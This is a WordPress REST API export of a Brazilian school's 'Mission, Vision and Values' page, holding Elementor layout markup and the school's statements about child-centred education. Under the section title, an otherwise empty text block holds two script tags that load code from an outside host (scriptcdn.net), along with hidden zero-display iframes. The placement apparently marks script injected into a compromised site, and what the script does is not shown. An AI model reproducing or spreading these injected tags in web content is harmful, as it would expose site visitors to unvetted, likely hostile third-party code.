{"id":2870,"date":"2023-09-04T11:46:45","date_gmt":"2023-09-04T09:46:45","guid":{"rendered":"https:\/\/wordpress.vecurosoft.com\/kiddino\/?page_id=2870"},"modified":"2025-04-10T13:05:45","modified_gmt":"2025-04-10T16:05:45","slug":"service","status":"publish","type":"page","link":"https:\/\/colegiounicocampinas.com.br\/?page_id=2870","title":{"rendered":"Miss\u00e3o, Vis\u00e3o e Valores"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"2870\" class=\"elementor elementor-2870\" data-elementor-settings=\"{&quot;ha_cmc_init_switcher&quot;:&quot;no&quot;}\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-20a4afb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"20a4afb\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;,&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-075dc1d\" data-id=\"075dc1d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-009c284 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"009c284\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-e8253e2\" data-id=\"e8253e2\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;gradient&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b74d4cf elementor-widget elementor-widget-kiddinosectiontitle\" data-id=\"b74d4cf\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"kiddinosectiontitle.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<!-- Section Title --><div class=\"title-area\" ><h2 class=\"sec-title title-selector\">Nossa Miss\u00e3o, Vis\u00e3o e Valores<\/h2><\/div><!-- End Section Title -->\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-fab8bd6 elementor-widget__width-initial elementor-widget elementor-widget-text-editor\" data-id=\"fab8bd6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"title-divider2\">\u00a0<\/div><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t<div class=\"elementor-element elementor-element-b26576c e-flex e-con-boxed e-con e-parent\" data-id=\"b26576c\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-4d3554c elementor-position-top ha-has-bg-overlay elementor-widget elementor-widget-image-box\" data-id=\"4d3554c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><figure class=\"elementor-image-box-img\"><img fetchpriority=\"high\" decoding=\"async\" width=\"247\" height=\"300\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/MISSAO-247x300.png\" class=\"attachment-medium size-medium wp-image-5690\" alt=\"\" srcset=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/MISSAO-247x300.png 247w, https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/MISSAO.png 584w\" sizes=\"(max-width: 247px) 100vw, 247px\" \/><\/figure><div class=\"elementor-image-box-content\"><p class=\"elementor-image-box-description\">Promover um ambiente acolhedor, emp\u00e1tico, estimulante e seguro, onde crian\u00e7as possam explorar, aprender e desenvolver-se de forma integral, em suas habilidades sociais, emocionais, cognitivas e motoras. Nossa miss\u00e3o \u00e9 proporcionar uma educa\u00e7\u00e3o de qualidade que respeite a individualidade de cada crian\u00e7a, incentivando a curiosidade a criatividade, a socializa\u00e7\u00e3o e o aprendizado significativo.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-88c4ec5 elementor-widget-divider--separator-type-pattern elementor-widget-divider--no-spacing elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"88c4ec5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"divider.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-divider\" style=\"--divider-pattern-url: url(&quot;data:image\/svg+xml,%3Csvg xmlns=&#039;http:\/\/www.w3.org\/2000\/svg&#039; preserveAspectRatio=&#039;xMidYMid meet&#039; overflow=&#039;visible&#039; height=&#039;100%&#039; viewBox=&#039;0 0 126 26&#039; fill=&#039;black&#039; stroke=&#039;none&#039;%3E%3Cpath d=&#039;M3,10.2c2.6,0,2.6,2,2.6,3.2S4.4,16.5,3,16.5s-3-1.4-3-3.2S0.4,10.2,3,10.2z M18.8,10.2c1.7,0,3.2,1.4,3.2,3.2s-1.4,3.2-3.2,3.2c-1.7,0-3.2-1.4-3.2-3.2S17,10.2,18.8,10.2z M34.6,10.2c1.5,0,2.6,1.4,2.6,3.2s-0.5,3.2-1.9,3.2c-1.5,0-3.4-1.4-3.4-3.2S33.1,10.2,34.6,10.2z M50.5,10.2c1.7,0,3.2,1.4,3.2,3.2s-1.4,3.2-3.2,3.2c-1.7,0-3.3-0.9-3.3-2.6S48.7,10.2,50.5,10.2z M66.2,10.2c1.5,0,3.4,1.4,3.4,3.2s-1.9,3.2-3.4,3.2c-1.5,0-2.6-0.4-2.6-2.1S64.8,10.2,66.2,10.2z M82.2,10.2c1.7,0.8,2.6,1.4,2.6,3.2s-0.1,3.2-1.6,3.2c-1.5,0-3.7-1.4-3.7-3.2S80.5,9.4,82.2,10.2zM98.6,10.2c1.5,0,2.6,0.4,2.6,2.1s-1.2,4.2-2.6,4.2c-1.5,0-3.7-0.4-3.7-2.1S97.1,10.2,98.6,10.2z M113.4,10.2c1.2,0,2.2,0.9,2.2,3.2s-0.1,3.2-1.3,3.2s-3.1-1.4-3.1-3.2S112.2,10.2,113.4,10.2z&#039;\/%3E%3C\/svg%3E&quot;);\">\n\t\t\t<span class=\"elementor-divider-separator\">\n\t\t\t\t\t\t<\/span>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8c67199 elementor-position-top ha-has-bg-overlay elementor-widget elementor-widget-image-box\" data-id=\"8c67199\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><figure class=\"elementor-image-box-img\"><img decoding=\"async\" width=\"259\" height=\"300\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/VISAO-259x300.png\" class=\"attachment-medium size-medium wp-image-5689\" alt=\"\" srcset=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/VISAO-259x300.png 259w, https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/VISAO-270x314.png 270w, https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/VISAO.png 622w\" sizes=\"(max-width: 259px) 100vw, 259px\" \/><\/figure><div class=\"elementor-image-box-content\"><p class=\"elementor-image-box-description\">Ser reconhecida como refer\u00eancia em educa\u00e7\u00e3o emp\u00e1tica e acolhedora, onde cada crian\u00e7a \u00e9 vista como um ser \u00fanico e especial. Buscamos formar cidad\u00e3os conscientes, cr\u00edticos, solid\u00e1rios, emp\u00e1ticos, felizes e preparados para enfrentar os desafios do futuro, sempre com um olhar atento \u00e0s suas necessidades e potencialidades.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8c1d60d elementor-widget-divider--separator-type-pattern elementor-widget-divider--no-spacing elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"8c1d60d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"divider.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-divider\" style=\"--divider-pattern-url: url(&quot;data:image\/svg+xml,%3Csvg xmlns=&#039;http:\/\/www.w3.org\/2000\/svg&#039; preserveAspectRatio=&#039;xMidYMid meet&#039; overflow=&#039;visible&#039; height=&#039;100%&#039; viewBox=&#039;0 0 126 26&#039; fill=&#039;black&#039; stroke=&#039;none&#039;%3E%3Cpath d=&#039;M3,10.2c2.6,0,2.6,2,2.6,3.2S4.4,16.5,3,16.5s-3-1.4-3-3.2S0.4,10.2,3,10.2z M18.8,10.2c1.7,0,3.2,1.4,3.2,3.2s-1.4,3.2-3.2,3.2c-1.7,0-3.2-1.4-3.2-3.2S17,10.2,18.8,10.2z M34.6,10.2c1.5,0,2.6,1.4,2.6,3.2s-0.5,3.2-1.9,3.2c-1.5,0-3.4-1.4-3.4-3.2S33.1,10.2,34.6,10.2z M50.5,10.2c1.7,0,3.2,1.4,3.2,3.2s-1.4,3.2-3.2,3.2c-1.7,0-3.3-0.9-3.3-2.6S48.7,10.2,50.5,10.2z M66.2,10.2c1.5,0,3.4,1.4,3.4,3.2s-1.9,3.2-3.4,3.2c-1.5,0-2.6-0.4-2.6-2.1S64.8,10.2,66.2,10.2z M82.2,10.2c1.7,0.8,2.6,1.4,2.6,3.2s-0.1,3.2-1.6,3.2c-1.5,0-3.7-1.4-3.7-3.2S80.5,9.4,82.2,10.2zM98.6,10.2c1.5,0,2.6,0.4,2.6,2.1s-1.2,4.2-2.6,4.2c-1.5,0-3.7-0.4-3.7-2.1S97.1,10.2,98.6,10.2z M113.4,10.2c1.2,0,2.2,0.9,2.2,3.2s-0.1,3.2-1.3,3.2s-3.1-1.4-3.1-3.2S112.2,10.2,113.4,10.2z&#039;\/%3E%3C\/svg%3E&quot;);\">\n\t\t\t<span class=\"elementor-divider-separator\">\n\t\t\t\t\t\t<\/span>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-da268dc elementor-position-top ha-has-bg-overlay elementor-widget elementor-widget-image-box\" data-id=\"da268dc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><figure class=\"elementor-image-box-img\"><img decoding=\"async\" width=\"257\" height=\"300\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/VALORES-257x300.png\" class=\"attachment-medium size-medium wp-image-5691\" alt=\"\" srcset=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/VALORES-257x300.png 257w, https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/VALORES-270x314.png 270w, https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/VALORES.png 602w\" sizes=\"(max-width: 257px) 100vw, 257px\" \/><\/figure><div class=\"elementor-image-box-content\"><p class=\"elementor-image-box-description\">1. Respeito: Valorizamos e respeitamos a diversidade e a individualidade de cada crian\u00e7a, promovendo um ambiente inclusivo e acolhedor.\n2. Empatia: Fomentamos rela\u00e7\u00f5es saud\u00e1veis e solid\u00e1rias entre crian\u00e7as, educadores e fam\u00edlias, promovendo a compreens\u00e3o e o cuidado m\u00fatuo.\n3. Criatividade: Estimulamos a imagina\u00e7\u00e3o e a express\u00e3o, permitindo que as crian\u00e7as se desenvolvam de maneira integral.\n4. Escola x Fam\u00edlia: Trabalhamos em parceria com as fam\u00edlias e a comunidade escolar, reconhecendo a import\u00e2ncia do envolvimento de todos no processo educativo.\n<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-21fde53 e-con-full e-flex e-con e-parent\" data-id=\"21fde53\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Nossa Miss\u00e3o, Vis\u00e3o e Valores \u00a0 Promover um ambiente acolhedor, emp\u00e1tico, estimulante e seguro, onde crian\u00e7as possam explorar, aprender e desenvolver-se de forma integral, em suas habilidades sociais, emocionais, cognitivas e motoras. Nossa miss\u00e3o \u00e9 proporcionar uma educa\u00e7\u00e3o de qualidade que respeite a individualidade de cada crian\u00e7a, incentivando a curiosidade a criatividade, a socializa\u00e7\u00e3o e&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"class_list":["post-2870","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/2870","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2870"}],"version-history":[{"count":14,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/2870\/revisions"}],"predecessor-version":[{"id":5705,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/2870\/revisions\/5705"}],"wp:attachment":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2870"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}